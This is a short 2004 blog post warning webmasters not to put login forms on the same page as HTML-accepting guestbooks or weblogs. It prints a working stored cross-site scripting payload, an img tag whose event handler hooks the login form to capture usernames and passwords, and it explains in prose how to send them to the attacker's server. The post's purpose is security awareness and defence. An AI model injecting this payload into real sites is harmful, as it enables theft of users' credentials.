Remove login pages to a seperate page!

Michael Schwarz on Tuesday, April 6, 2004

I looked arround in the web to find websites with security lecks. After months there is no change to the webmasters, they still offer login textboxes side-by-side to guestbooks or weblogs. Some weeks ago I posted a sample on how to allow javascript execution on websites with a mouseover. But this was not very good...

Today, I will show code that allows you to get username and password from pages that have the login form on the same page as the guestbook. The following code can be added to a guestbook or a weblog if the accept html code, the do not have to allow <SCRIPT> tags:

<img src="/trans.gif [1]" onreadystatechange="document.forms[0].onsubmit=new Function('alert(\'Website hacked: \'+document.forms[0].username.value+\'|\'+document.forms[0].password.value);');" width=1 height=1>

Now, if the page will be shown the onreadystatechange event will be fired (Note: the trans.gif must be available on this website, can be replaced by any other image!). We add a new function to the event handler submit. If you click on submit (will be login) a message box will appear showing your credentials. It is very easy to load a second image from your server with the credentials as additional arguments like, so you have everything you want.

I have created this small script to show you how easy it still is to get user credentials.

To be secure put the login form to a seperate page!!!

If you need assistence to prevent such security lecks go to [2] to get help.